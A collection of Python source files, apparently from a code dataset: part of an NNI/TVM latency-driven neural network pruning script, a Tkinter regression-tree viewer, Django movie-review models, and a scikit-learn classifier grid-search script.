lib_fname = None\n tracker_host = None\n tracker_port = None\n tracker = None\n remote = None\n ctx = None\n rlib = None\n module = None\n del input_data\n del scripted_model\n del mod\n del params\n del lib\n del lib_fname\n del tracker_host\n del tracker_port\n del tracker\n del remote\n del ctx\n del rlib\n del module\n gc.collect()\n \n pruning_iteration = 1\n delta_num_weights_per_iteration = \\\n int(get_total_num_weights(self._model_to_prune, ['Conv2d', 'Linear']) * self._sparsity_per_iteration)\n init_resource_reduction_ratio = 0.025 # 0.05 \n resource_reduction_decay = 0.96 #0.98\n max_iter = 120\n\n budget = 13.421 #budget_times * current_fps\n init_resource_reduction = init_resource_reduction_ratio * current_latency\n print('Current latency: {:>8.4f}'.format(current_latency))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Budget: {:>8.4f}, Current latency: {:>8.4f}\\n'.format(budget, current_latency))\n file_object.close()\n current_accuracy = self._evaluator(self._model_to_prune)\n improper_layer = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n subgroup_num = 3\n subgroup_criterion = 14 - subgroup_num\n next_additional_cut = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n # stop condition\n# while pruning_iteration < max_iter and current_latency > budget:\n while pruning_iteration < max_iter and subgroup_criterion > 1 - subgroup_num:\n _logger.info('Pruning iteration: %d', pruning_iteration)\n\n # calculate target sparsity of this iteration\n# target_sparsity = current_sparsity + self._sparsity_per_iteration\n target_latency = current_latency - init_resource_reduction * (\n resource_reduction_decay ** (pruning_iteration - 1))\n\n # Print the message\n print('=======================')\n print(('Process iteration {:>3}: current_accuracy = {:>8.3f}, '\n 'current_latency = {:>8.3f}, target_latency = {:>8.3f} \\n').format(pruning_iteration, current_accuracy, current_latency, target_latency)) \n file_object = open('./record_tvm.txt', 'a') \n file_object.write(('Process iteration {:>3}: current_accuracy = {:>8.3f}, '\n 'current_latency = {:>8.3f}, target_resource = {:>8.3f} \\n').format(pruning_iteration, current_accuracy, current_latency, target_latency))\n file_object.close()\n\n # variable to store the info of the best layer found in this iteration\n best_op = {}\n improper_idx = 0\n layer_idx = 1\n total_channel = 0\n\n for wrapper in self.get_modules_wrapper():\n if layer_idx < subgroup_criterion:\n print('Not in subgroup: layer {:2d}'.format(layer_idx))\n layer_idx += 1\n improper_idx += 1\n continue\n current_op_sparsity = 1 - wrapper.weight_mask.sum().item() / wrapper.weight_mask.numel()\n\n # sparsity that this layer needs to prune to satisfy the requirement\n# target_op_sparsity = current_op_sparsity + delta_num_weights_per_iteration / self._calc_num_related_weights(wrapper.name)\n\n if layer_idx > 7:\n total_channels = 512 \n elif layer_idx > 4:\n total_channels = 256 \n elif layer_idx > 2:\n total_channels = 128 \n else:\n total_channels = 64\n print('current_op_sparsity: {:>8.4f}'.format(current_op_sparsity))\n if current_op_sparsity < 0.125:\n target_op_sparsity = 0.125 + next_additional_cut[improper_idx] * (8 / total_channels) # initial sparsity\n# elif current_op_sparsity + 8 / total_channels == 1:\n elif current_op_sparsity >= 1 - 0.0625:\n subgroup_criterion -= 1\n improper_layer[improper_idx] = 1 \n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Improper Layer: {} \\n'.format(wrapper.name))\n file_object.close()\n improper_idx += 1\n 
continue\n else:\n target_op_sparsity = current_op_sparsity + (1 + next_additional_cut[improper_idx]) * (8 / total_channels)\n ch_num = int((1 - target_op_sparsity) * total_channels)\n layer_idx += 1\n\n if improper_layer[improper_idx] == 1:\n print('Improper layer')\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Improper Layer: ' + wrapper.name + '\\n')\n file_object.close()\n improper_idx += 1\n continue\n\n while_count = 0\n\n while True:\n while_count += 1\n config_list = self._update_config_list(self._config_list_generated, wrapper.name, target_op_sparsity)\n pruner = PRUNER_DICT[self._base_algo](copy.deepcopy(self._model_to_prune), config_list)\n model_masked = pruner.compress()\n\n # added 0: speed_up\n pruner.export_model('./model_masked.pth', './mask.pth')\n model = VGG(depth=self._num).to(device)\n model.load_state_dict(torch.load('./model_masked.pth'))\n masks_file = './mask.pth'\n m_speedup = ModelSpeedup(model, self._dummy_input, masks_file, device)\n m_speedup.speedup_model()\n # added 1: Autotune + TVM build\n model.eval()\n _, _, _ = count_flops_params(model, (1, 3, 32, 32))\n input_shape = [1, 3, 32, 32]\n output_shape = [1, 10]\n input_data = torch.randn(input_shape).to(device)\n# scripted_model = torch.jit.trace(self._model_to_prune, input_data).eval()\n scripted_model = torch.jit.trace(model, input_data).eval()\n input_name = \"input0\"\n shape_list = [(input_name, img.shape)]\n mod, params = relay.frontend.from_pytorch(scripted_model, shape_list)\n ########### NCHW -> NHWC ############\n desired_layouts = {'nn.conv2d': ['NHWC', 'default'], 'nn.dense': ['NHWC', 'default']} # added\n seq = tvm.transform.Sequential([relay.transform.RemoveUnusedFunctions(),\n relay.transform.ConvertLayout(desired_layouts)])\n with tvm.transform.PassContext(opt_level=3):\n mod = seq(mod)\n #####################################\n tracker_host = os.environ.get(\"TVM_TRACKER_HOST\", \"0.0.0.0\")\n tracker_port = int(os.environ.get(\"TVM_TRACKER_PORT\", 9190))\n #################### Extract search tasks ###################\n print(\"Extract tasks...\")\n tasks, task_weights = auto_scheduler.extract_tasks(mod[\"main\"], params, target)\n print(\"=============== Weights check ==============\")\n print(task_weights)\n\n for idx, task in enumerate(tasks):\n print(\"============ Task %d (workload key: %s) ===========\" % (idx, task.workload_key))\n print(task.compute_dag)\n #################### Tuning #####################\n print(\"Begin tuning...\")\n tuner = auto_scheduler.TaskScheduler(tasks, task_weights)\n tune_option = auto_scheduler.TuningOptions(\n num_measure_trials=5000,\n builder=auto_scheduler.LocalBuilder(build_func=\"ndk\" if use_android else \"default\"),\n runner=auto_scheduler.RPCRunner(device_key, host=tracker_host, port=tracker_port, timeout=10000, repeat=1, min_repeat_ms=200, enable_cpu_cache_flush=True,),\n measure_callbacks=[auto_scheduler.RecordToFile(log_file)],\n#\t\t\tverbose=1,\n )\n tuner.tune(tune_option, per_task_early_stopping=30)\n #################### Compile ####################\n print(\"Compile...\")\n with auto_scheduler.ApplyHistoryBest(log_file):\n with tvm.transform.PassContext(opt_level=3, config={\"relay.backend.use_auto_scheduler\": True}):\n lib = relay.build(mod, target=target, params=params)\n \n tmp = utils.tempdir()\n lib_fname = tmp.relpath(\"net.so\")\n lib.export_library(lib_fname, ndk.create_shared)\n remote = auto_scheduler.utils.request_remote(device_key, tracker_host, tracker_port, timeout=10000)\n remote.upload(lib_fname)\n 
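# The commented-out lines nearby measure latency with TVM's built-in evaluator
# instead of the hand-rolled _test3 loop; that variant as a sketch.
import numpy as np
import tvm

def measure_latency_ms(module, input_name, ctx, input_shape, dtype="float32"):
    data_tvm = tvm.nd.array(np.random.uniform(size=input_shape).astype(dtype))
    module.set_input(input_name, data_tvm)
    # time_evaluator handles warm-up and repetition on the remote device.
    ftimer = module.module.time_evaluator("run", ctx, repeat=3, min_repeat_ms=500)
    return float(np.mean(np.array(ftimer().results) * 1e3))  # seconds -> ms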
rlib = remote.load_module(\"net.so\")\n ctx = remote.cpu()\n# ctx = remote.cl()\n module = graph_executor.GraphModule(rlib[\"default\"](ctx))\n\n temp_latency = self._test3(module, input_name, ctx, \"TVM_initial\")\n# data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))\n# module.set_input(input_name, data_tvm)\n# print(\"Evaluate inference time cost...\")\n# ftimer = module.module.time_evaluator(\"run\", ctx, repeat=3, min_repeat_ms=500)\n# prof_res = np.array(ftimer().results) * 1e3\n# print(\"Mean inference time (std dev): %8.4f ms (%8.4f ms)\" %(np.mean(prof_res), np.std(prof_res)))\n# temp_latency = np.mean(prof_res)\n #################################################\n\n input_data = None\n scripted_model = None\n mod = None\n params = None\n lib = None\n lib_fname = None\n tracker_host = None\n tracker_port = None\n tracker = None\n remote = None\n ctx = None\n rlib = None\n module = None\n del input_data\n del scripted_model\n del mod\n del params\n del lib\n del lib_fname\n del tracker_host\n del tracker_port\n del tracker\n del remote\n del ctx\n del rlib\n del module\n gc.collect()\n\n print('Layer: {}, Temp latency: {:>8.4f}, Channel: {:4d}'.format(wrapper.name, temp_latency, ch_num))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Layer: {}, Temp latency: {:>8.4f}, Channel: {:4d}\\n'.format(wrapper.name, temp_latency, ch_num))\n file_object.close()\n\n if temp_latency <= target_latency:\n next_additional_cut[improper_idx] += int(while_count / 3)\n break\n else:\n# if target_op_sparsity < 1 - 10 / total_channels:\n# target_op_sparsity += 8 / total_channels\n# ch_num -= 8\n if target_op_sparsity < 1 - 0.0625:\n if total_channels <= 128 and target_op_sparsity < 1 - 0.125:\n target_op_sparsity += 0.125\n ch_num -= int(0.125 * total_channels)\n else:\n target_op_sparsity += 0.0625\n ch_num -= int(0.0625 * total_channels)\n else:\n subgroup_criterion -= 1\n print('Improper layer')\n improper_layer[improper_idx] = 1\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Improper layer: {} \\n'.format(wrapper.name))\n file_object.close()\n break\n\n # Short-term fine tune the pruned model\n if improper_layer[improper_idx] == 0:\n self._short_term_fine_tuner(model_masked, epochs=2)\n performance = self._evaluator(model_masked)\n print('Layer: {}, Evaluation result after short-term fine tuning: {:>8.4f}'.format(wrapper.name, performance))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Layer: {}, Accuracy: {:>8.4f}\\n'.format(wrapper.name, performance))\n file_object.close()\n\n if temp_latency <= target_latency and \\\n ( not best_op \\\n or (self._optimize_mode is OptimizeMode.Maximize and performance >= best_op['performance']) \\\n or (self._optimize_mode is OptimizeMode.Minimize and performance < best_op['performance'])):\n _logger.debug(\"updating best layer to %s...\", wrapper.name)\n # find weight mask of this layer\n for w in pruner.get_modules_wrapper():\n if w.name == wrapper.name:\n masks = {'weight_mask': w.weight_mask,\n 'bias_mask': w.bias_mask}\n break\n best_op = {\n 'op_name': wrapper.name,\n 'sparsity': target_op_sparsity,\n 'ch_num': ch_num,\n 'improper_idx': improper_idx,\n 'latency': temp_latency,\n 'performance': performance,\n 'masks': masks\n }\n\n current_latency = temp_latency\n\n # save model weights\n pruner.export_model(self._tmp_model_path)\n\n# print('Relaunch app!')\n# time.sleep(60)\n improper_idx += 1\n\n if not best_op:\n# # decrease pruning step\n# self._sparsity_per_iteration 
*= 0.5\n# _logger.info(\"No more layers to prune, decrease pruning step to %s\", self._sparsity_per_iteration)\n# pruning_iteration = max_iter\n continue\n\n # Pick the best layer to prune, update iterative information\n # update config_list\n self._config_list_generated = self._update_config_list(\n self._config_list_generated, best_op['op_name'], best_op['sparsity'])\n\n # update weights parameters\n self._model_to_prune.load_state_dict(torch.load(self._tmp_model_path))\n print('Budget: {:>8.4f}, Current latency: {:>8.4f}'.format(budget, best_op['latency']))\n file_object = open('./record_tvm.txt', 'a')\n file_object.write('Budget: {:>8.4f}, Current latency: {:>8.4f} \\n'.format(budget, best_op['latency']))\n\n # update mask of the chosen op\n for wrapper in self.get_modules_wrapper():\n if wrapper.name == best_op['op_name']:\n for k in best_op['masks']:\n setattr(wrapper, k, best_op['masks'][k])\n break\n\n file_object.write('Layer {} selected with {:4d} channels, latency {:>8.4f}, accuracy {:>8.4f} \\n'.format(best_op['op_name'], best_op['ch_num'], best_op['latency'], best_op['performance']))\n file_object.close()\n# current_sparsity = target_sparsity\n# _logger.info('Pruning iteration %d finished, current sparsity: %s', pruning_iteration, current_sparsity)\n _logger.info('Layer %s selected with sparsity %s, performance after pruning & short term fine-tuning : %s', best_op['op_name'], best_op['sparsity'], best_op['performance'])\n pruning_iteration += 1\n next_additional_cut[best_op['improper_idx']] = 0\n\n self._final_performance = best_op['performance']\n\n # load weights parameters\n self.load_model_state_dict(torch.load(self._tmp_model_path))\n# os.remove(self._tmp_model_path)\n\n _logger.info('----------Compression finished--------------')\n _logger.info('config_list generated: %s', self._config_list_generated)\n _logger.info(\"Performance after pruning: %s\", self._final_performance)\n# _logger.info(\"Masked sparsity: %.6f\", current_sparsity)\n\n # save best config found and best performance\n with open(os.path.join(self._experiment_data_dir, 'search_result.json'), 'w') as jsonfile:\n json.dump({\n 'performance': self._final_performance,\n 'config_list': json.dumps(self._config_list_generated)\n }, jsonfile)\n\n _logger.info('search history and result saved to folder : %s', self._experiment_data_dir)\n\n return self.bound_model\n","repo_name":"taehokim20/CPrune","sub_path":"tutorials/frontend/nni/algorithms/compression/pytorch/pruning/original/net_adapt_pruner_ansor.py","file_name":"net_adapt_pruner_ansor.py","file_ext":"py","file_size_in_byte":38019,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"}
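# Stripped of the TVM plumbing, compress() above is a greedy NetAdapt-style
# search. A runnable toy sketch of the per-iteration selection step; the
# measure/evaluate callables stand in for on-device latency and short-term
# fine-tuned accuracy (both hypothetical here).
import random

def pick_best_layer(layers, target_latency, measure, evaluate):
    # Among per-layer pruning candidates that meet the latency target,
    # keep the one whose short-term fine-tuned accuracy is highest.
    best = None
    for layer in layers:
        latency = measure(layer)
        if latency > target_latency:
            continue
        accuracy = evaluate(layer)
        if best is None or accuracy > best[1]:
            best = (layer, accuracy, latency)
    return best

print(pick_best_layer(['conv1', 'conv2', 'conv3'], 0.9,
                      measure=lambda l: random.random(),
                      evaluate=lambda l: random.random()))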
+{"seq_id":"7559325812","text":"#coding=utf-8\r\n'''\r\nCreated on Aug 21, 2017\r\nTree-Based Regression Methods\r\n@author: Edgis\r\n'''\r\nfrom numpy import *\r\nfrom tkinter import *\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nimport regTrees\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nfrom matplotlib.figure import Figure\r\n\r\n\"\"\"\r\ndef reDraw(tolS, tolN):\r\n pass\r\n\r\ndef drawNewTree():\r\n pass\r\n\"\"\"\r\n\r\n\r\ndef reDraw(tolS, tolN):\r\n reDraw.f.clf() #clear the previous figure\r\n reDraw.a = reDraw.f.add_subplot(111)\r\n if chkBtnVar.get():\r\n if tolN <2:\r\n #build a model tree\r\n tolN = 2\r\n myTree = regTrees.createTree(reDraw.rawDat, regTrees.modelLeaf,regTrees.modelErr,(tolS,tolN))\r\n yHat = regTrees.createForeCast(myTree,reDraw.testDat,regTrees.modelTreeEval)\r\n else:\r\n #build a regression tree\r\n myTree = regTrees.createTree(reDraw.rawDat,ops=(tolS,tolN))\r\n yHat = regTrees.createForeCast(myTree,reDraw.testDat)\r\n reDraw.a.scatter(reDraw.rawDat[:,0],reDraw.rawDat[:,1],s=5)\r\n reDraw.a.plot(reDraw.testDat, yHat, linewidth=2.0)\r\n reDraw.canvas.show()\r\n\r\n\r\ndef getInput():\r\n try:\r\n tolN = int(tolNentry.get())\r\n except:\r\n tolN = 10\r\n print(\"enter Integer for tolN\")\r\n #clear the invalid input and fall back to the default\r\n tolNentry.delete(0, END)\r\n tolNentry.insert(0,'10')\r\n try:\r\n tolS = float(tolSentry.get())\r\n except:\r\n tolS = 1.0\r\n print(\"enter Float for tolS\")\r\n tolSentry.delete(0,END)\r\n tolSentry.insert(0,'1.0')\r\n return tolN, tolS\r\n\r\ndef drawNewTree():\r\n tolN, tolS = getInput()\r\n reDraw(tolS, tolN)\r\n\r\n\r\nroot = Tk()\r\n\r\nLabel(root, text ='Plot Place Holder').grid(row=0,columnspan=3)\r\n\r\nLabel(root, text='tolN').grid(row = 1, column=0)\r\ntolNentry = Entry(root)\r\ntolNentry.grid(row=1,column=1)\r\ntolNentry.insert(0,'10')\r\nLabel(root,text='tolS').grid(row=2,column=0)\r\ntolSentry = Entry(root)\r\ntolSentry.grid(row=2,column=1)\r\ntolSentry.insert(0,'1.0')\r\nButton(root,text='ReDraw',command=drawNewTree).grid(row =1, column=2, rowspan=3)\r\nchkBtnVar = IntVar()\r\nchkBtn = Checkbutton(root, text='Model Tree',variable = chkBtnVar) #checkbox\r\nchkBtn.grid(row=3,column=0,columnspan=2)\r\n\r\nreDraw.rawDat = mat(regTrees.loadDataSet('sine.txt'))\r\nreDraw.testDat = arange(min(reDraw.rawDat[:,0]), max(reDraw.rawDat[:,0]), 0.01)\r\n\r\nreDraw.f = Figure(figsize=(5,4),dpi=100)\r\nreDraw.canvas = FigureCanvasTkAgg(reDraw.f, master=root)\r\nreDraw.canvas.show()\r\nreDraw.canvas.get_tk_widget().grid(row = 0,columnspan=3)\r\n\r\n#reDraw(1.0,10)\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"Edgis/Machine-learning-in-action","sub_path":"treeExplore.py","file_name":"treeExplore.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26507674605","text":"from django.db import models\nfrom django.conf import settings\n\n\n########################################################\nclass Genre(models.Model):\n name = models.CharField(max_length=50)\n\n def __str__(self):\n return f\"{self.name}\"\n\n########################################################\nclass Movie(models.Model):\n title = models.CharField(max_length=50)\n overview = models.TextField()\n poster_path = models.TextField()\n release_date = models.CharField(max_length=50)\n vote_average = models.FloatField()\n tagline = models.TextField(blank=True)\n revenue = models.FloatField()\n genre = models.ManyToManyField(Genre)\n ours_vote = models.FloatField(default=0)\n vote_count = models.IntegerField(default=0)\n\n def __str__(self):\n return f\"{self.title}\"\n \n\n########################################################\nclass Review(models.Model):\n vote = models.FloatField()\n content = models.TextField(blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name=\"myreviews\")\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)\n # field set up so the review author's name can be displayed\n\n\n########################################################\nclass Comment(models.Model):\n content = models.TextField()\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n review = models.ForeignKey(Review, on_delete=models.CASCADE)\n\n\n########################################################\nclass stillcut(models.Model):\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)\n img_url = models.TextField()\n\n########################################################\nclass youtube_key(models.Model):\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)\n key = models.CharField(max_length=20)\n\n\n########################################################\n","repo_name":"PassionSoftIan/Orbit_Project","sub_path":"final-pjt-back/back/movies/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4487568730","text":"res = {}\n# note: the module-level __init__ below is never invoked; compute(db) is the entry point\ndef __init__(self, db):\n self.db = db\ndef compute(db):\n from scipy.io import arff\n\n import pandas as pd\n\n data = arff.loadarff(db)\n\n df = pd.DataFrame(data[0])\n X = df.iloc[:, :-1].values\n Y_data = df.iloc[:, -1].values\n from sklearn.preprocessing import MultiLabelBinarizer\n from sklearn.preprocessing import LabelEncoder\n lb_make = LabelEncoder()\n y = lb_make.fit_transform(Y_data)\n # y = MultiLabelBinarizer().fit_transform(Y_data)\n from sklearn.tree import DecisionTreeClassifier\n tree_clf = DecisionTreeClassifier()\n # Feature Engineering\n\n # 1.Imputation\n from sklearn.impute import SimpleImputer\n\n X_copy = df.iloc[:, :-1].copy()\n\n imputer = SimpleImputer(strategy=\"median\")\n\n imputer.fit(X_copy)\n\n new_X = imputer.transform(X_copy)\n\n new_X_df = pd.DataFrame(new_X, columns=X_copy.columns, index=X_copy.index)\n # Scaling Standardization\n from sklearn import preprocessing\n scaler = preprocessing.StandardScaler().fit(new_X)\n new_X = scaler.transform(new_X)\n\n # Feature selection, removing features with low variance\n from sklearn.feature_selection import VarianceThreshold\n sel = VarianceThreshold(threshold=(.8 * (1 - .8)))\n new_X = sel.fit_transform(new_X)\n # Training\n from sklearn.model_selection import train_test_split\n\n X_train, X_test, y_train, y_test = train_test_split(new_X, y, test_size=0.15, random_state=42)\n from sklearn.model_selection import cross_val_score\n\n # grid search DT\n from sklearn.model_selection import GridSearchCV\n\n import numpy as np\n\n depths = np.arange(1, 11)\n\n num_leafs = [1, 5, 10, 20, 50]\n\n param_grid = {'criterion': ['gini', 'entropy'], 'max_depth': depths, 'min_samples_leaf': num_leafs}\n\n new_tree_clf = DecisionTreeClassifier()\n\n grid_search_acc = GridSearchCV(new_tree_clf, param_grid, cv=10, scoring=\"accuracy\", return_train_score=True)\n grid_search_acc.fit(X_train, y_train)\n grid_search_f1 = GridSearchCV(new_tree_clf, param_grid, cv=10, scoring=\"f1_micro\", return_train_score=True)\n grid_search_f1.fit(X_train, y_train)\n # evaluation\n from sklearn.metrics import accuracy_score\n\n best_model_acc = grid_search_acc.best_estimator_\n best_model_f1 = grid_search_f1.best_estimator_\n tree_clf.fit(X_train, y_train)\n\n # Train and Test accuracy\n dt_train_acc = accuracy_score(y_train, best_model_acc.predict(X_train))\n dt_test_acc = accuracy_score(y_test, best_model_acc.predict(X_test))\n dt_train_f1 = accuracy_score(y_train, best_model_f1.predict(X_train))\n dt_test_f1 = accuracy_score(y_test, best_model_f1.predict(X_test))\n\n res = {}\n res[db+\"_decision_tree_train_acc\"] = dt_train_acc\n res[db+\"_decision_tree_test_acc\"] = dt_test_acc\n res[db+\"_decision_tree_train_f1\"] = dt_train_f1\n res[db+\"_decision_tree_test_f1\"] = 
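# The Movie model above carries an ours_vote / vote_count pair; one
# hypothetical way to maintain it when a review arrives (this helper is an
# illustration, not part of the original app):
def add_review_vote(movie, vote):
    # Fold a new review's vote into the running average kept on Movie.
    movie.ours_vote = (movie.ours_vote * movie.vote_count + vote) / (movie.vote_count + 1)
    movie.vote_count += 1
    movie.save(update_fields=['ours_vote', 'vote_count'])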
dt_test_f1\n # Grid Search RF\n from sklearn.ensemble import RandomForestClassifier\n\n rf_param_grid = {\n 'n_estimators': [20, 40, 60, 80, 100],\n 'max_depth': [2, 5, 7],\n 'min_samples_leaf': [1, 2, 4]}\n rf = RandomForestClassifier()\n rf_grid_search_acc = GridSearchCV(rf, rf_param_grid, cv=3, scoring=\"accuracy\", return_train_score=True)\n rf_grid_search_acc.fit(X_train, y_train)\n rf_grid_search_f1 = GridSearchCV(rf, rf_param_grid, cv=3, scoring=\"f1_micro\", return_train_score=True)\n rf_grid_search_f1.fit(X_train, y_train)\n # Evaluation\n rf_best_model_acc = rf_grid_search_acc.best_estimator_\n rf_best_model_f1 = rf_grid_search_f1.best_estimator_\n rf_train_acc = accuracy_score(y_train, rf_best_model_acc.predict(X_train))\n rf_test_acc = accuracy_score(y_test, rf_best_model_acc.predict(X_test))\n rf_train_f1 = accuracy_score(y_train, rf_best_model_f1.predict(X_train))\n rf_test_f1 = accuracy_score(y_test, rf_best_model_f1.predict(X_test))\n res[db+\"_random_forest_train_acc\"] = rf_train_acc\n res[db+\"_random_forest_test_acc\"] = rf_test_acc\n res[db+\"_random_forest_train_f1\"] = rf_train_f1\n res[db+\"_random_forest_test_f1\"] = rf_test_f1\n # CV Grid Search\n from sklearn.naive_bayes import GaussianNB\n nb = GaussianNB()\n nb_params = {}\n nb_grid_search_acc = GridSearchCV(nb, nb_params, cv=3, scoring=\"accuracy\", return_train_score=True)\n nb_grid_search_f1 = GridSearchCV(nb, nb_params, cv=3, scoring=\"f1_micro\", return_train_score=True)\n nb_grid_search_acc.fit(X_train, y_train)\n nb_grid_search_f1.fit(X_train, y_train)\n nb_best_model_acc = nb_grid_search_acc.best_estimator_\n nb_best_model_f1 = nb_grid_search_f1.best_estimator_\n nb_train_acc = accuracy_score(y_train, nb_best_model_acc.predict(X_train))\n nb_test_acc = accuracy_score(y_test, nb_best_model_acc.predict(X_test))\n nb_train_f1 = accuracy_score(y_train, nb_best_model_f1.predict(X_train))\n nb_test_f1 = accuracy_score(y_test, nb_best_model_f1.predict(X_test))\n res[db+\"_naive_bayes_train_acc\"] = nb_train_acc\n res[db+\"_naive_bayes_test_acc\"] = nb_test_acc\n res[db+\"_naive_bayes_train_f1\"] = nb_train_f1\n res[db+\"_naive_bayes_test_f1\"] = nb_test_f1\n # SVC Grid Search\n # linear\n from sklearn import svm\n linear = svm.SVC(kernel='linear')\n parameters = {'C': [1, 10]}\n linear_grid_search_acc = GridSearchCV(linear, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n linear_grid_search_f1 = GridSearchCV(linear, parameters, cv=3, scoring=\"f1_micro\", return_train_score=True)\n linear_grid_search_acc.fit(X_train, y_train)\n linear_grid_search_f1.fit(X_train, y_train)\n linear_best_model_acc = linear_grid_search_acc.best_estimator_\n linear_best_model_f1 = linear_grid_search_f1.best_estimator_\n linear_train_acc = accuracy_score(y_train, linear_best_model_acc.predict(X_train))\n linear_test_acc = accuracy_score(y_test, linear_best_model_acc.predict(X_test))\n linear_train_f1 = accuracy_score(y_train, linear_best_model_f1.predict(X_train))\n linear_test_f1 = accuracy_score(y_test, linear_best_model_f1.predict(X_test))\n res[db+\"_svc_linear_train_acc\"] = linear_train_acc\n res[db+\"_svc_linear_test_acc\"] = linear_test_acc\n res[db+\"_svc_linear_train_f1\"] = linear_train_f1\n res[db+\"_svc_linear_test_f1\"] = linear_test_f1\n # polynomial\n poly = svm.SVC(kernel='poly')\n parameters = {'C': [1, 10]}\n poly_grid_search_acc = GridSearchCV(poly, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n poly_grid_search_f1 = GridSearchCV(poly, parameters, cv=3, scoring=\"f1_micro\", 
return_train_score=True)\n poly_grid_search_acc.fit(X_train, y_train)\n poly_grid_search_f1.fit(X_train, y_train)\n poly_best_model_acc = poly_grid_search_acc.best_estimator_\n poly_best_model_f1 = poly_grid_search_f1.best_estimator_\n poly_train_acc = accuracy_score(y_train, poly_best_model_acc.predict(X_train))\n poly_test_acc = accuracy_score(y_test, poly_best_model_acc.predict(X_test))\n poly_train_f1 = accuracy_score(y_train, poly_best_model_f1.predict(X_train))\n poly_test_f1 = accuracy_score(y_test, poly_best_model_f1.predict(X_test))\n res[db+\"_svc_poly_train_acc\"] = poly_train_acc\n res[db+\"_svc_poly_test_acc\"] = poly_test_acc\n res[db+\"_svc_poly_train_f1\"] = poly_train_f1\n res[db+\"_svc_poly_test_f1\"] = poly_test_f1\n # rbf\n rbf = svm.SVC(kernel='rbf')\n parameters = {'C': [1, 10]}\n rbf_grid_search_acc = GridSearchCV(rbf, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n rbf_grid_search_f1 = GridSearchCV(rbf, parameters, cv=3, scoring=\"f1_micro\", return_train_score=True)\n rbf_grid_search_acc.fit(X_train, y_train)\n rbf_grid_search_f1.fit(X_train, y_train)\n rbf_best_model_acc = rbf_grid_search_acc.best_estimator_\n rbf_best_model_f1 = rbf_grid_search_f1.best_estimator_\n rbf_train_acc = accuracy_score(y_train, rbf_best_model_acc.predict(X_train))\n rbf_test_acc = accuracy_score(y_test, rbf_best_model_acc.predict(X_test))\n rbf_train_f1 = accuracy_score(y_train, rbf_best_model_f1.predict(X_train))\n rbf_test_f1 = accuracy_score(y_test, rbf_best_model_f1.predict(X_test))\n res[db+\"_svc_rbf_train_acc\"] = rbf_train_acc\n res[db+\"_svc_rbf_test_acc\"] = rbf_test_acc\n res[db+\"_svc_rbf_train_f1\"] = rbf_train_f1\n res[db+\"_svc_rbf_test_f1\"] = rbf_test_f1\n # sigmoid\n sigmoid = svm.SVC(kernel='sigmoid')\n parameters = {'C': [1, 10]}\n sigmoid_grid_search_acc = GridSearchCV(sigmoid, parameters, cv=3, scoring=\"accuracy\", return_train_score=True)\n sigmoid_grid_search_f1 = GridSearchCV(sigmoid, parameters, cv=3, scoring=\"f1_micro\", return_train_score=True)\n sigmoid_grid_search_acc.fit(X_train, y_train)\n sigmoid_grid_search_f1.fit(X_train, y_train)\n sigmoid_best_model_acc = sigmoid_grid_search_acc.best_estimator_\n sigmoid_best_model_f1 = sigmoid_grid_search_f1.best_estimator_\n sigmoid_train_acc = accuracy_score(y_train, sigmoid_best_model_acc.predict(X_train))\n sigmoid_test_acc = accuracy_score(y_test, sigmoid_best_model_acc.predict(X_test))\n sigmoid_train_f1 = accuracy_score(y_train, sigmoid_best_model_f1.predict(X_train))\n sigmoid_test_f1 = accuracy_score(y_test, sigmoid_best_model_f1.predict(X_test))\n res[db+\"_svc_sigmoid_train_acc\"] = sigmoid_train_acc\n res[db+\"_svc_sigmoid_test_acc\"] = sigmoid_test_acc\n res[db+\"_svc_sigmoid_train_f1\"] = sigmoid_train_f1\n res[db+\"_svc_sigmoid_test_f1\"] = sigmoid_test_f1\n\n # result\n return res\n\n\n","repo_name":"QiaoLin22/smell-detection-ml","sub_path":"algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":9417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
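# Every model block in compute() above repeats the same tune-twice-then-score
# pattern; a compact helper capturing it. Note: this sketch scores the
# f1-tuned model with f1_score(average='micro') to match the 'f1_micro'
# objective, whereas the original computes its *_f1 entries with
# accuracy_score -- an assumption about intent, not the original behavior.
from sklearn.metrics import accuracy_score, f1_score
from sklearn.model_selection import GridSearchCV

def tuned_scores(estimator, param_grid, X_train, y_train, X_test, y_test, cv=3):
    out = {}
    scorers = [("accuracy", accuracy_score),
               ("f1_micro", lambda y, p: f1_score(y, p, average="micro"))]
    for scoring, metric in scorers:
        gs = GridSearchCV(estimator, param_grid, cv=cv, scoring=scoring,
                          return_train_score=True)
        gs.fit(X_train, y_train)
        best = gs.best_estimator_
        out[scoring] = (metric(y_train, best.predict(X_train)),
                        metric(y_test, best.predict(X_test)))
    return out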
